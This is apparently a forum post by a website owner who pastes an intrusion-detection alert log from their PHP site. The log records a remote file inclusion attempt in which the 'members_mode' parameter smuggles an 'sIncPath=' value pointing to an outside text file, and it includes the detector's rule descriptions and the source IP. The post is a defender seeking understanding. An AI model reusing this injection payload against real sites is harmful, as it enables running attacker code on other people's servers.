I got 5 emails today saying "possible security attack!"
They all have pretty much the same content:
Total impact: 16
Affected tags: xss, csrf, id, rfe, lfi
Variable: REQUEST.members_mode | Value: top//?sIncPath= http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt???
Impact: 8 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe,
lfi | ID: 61
Variable: GET.members_mode | Value: top//?sIncPath= http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt???
Impact: 8 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe,
lfi | ID: 61
REMOTE_ADDR: 74.205.120.218
HTTP_X_FORWARDED_FOR:
HTTP_CLIENT_IP:
SCRIPT_FILENAME: /home/cosmobc/cosmobc.com/index.php
QUERY_STRING: members_mode=top//%3fsIncPath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt%3f%3f%3f
REQUEST_URI: /index.php?members_mode=top//%
QUERY_STRING: members_mode=top//%3fsIncPath=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/z.txt%3f%3f%3f
SCRIPT_NAME: /index.php
PHP_SELF: /index.php
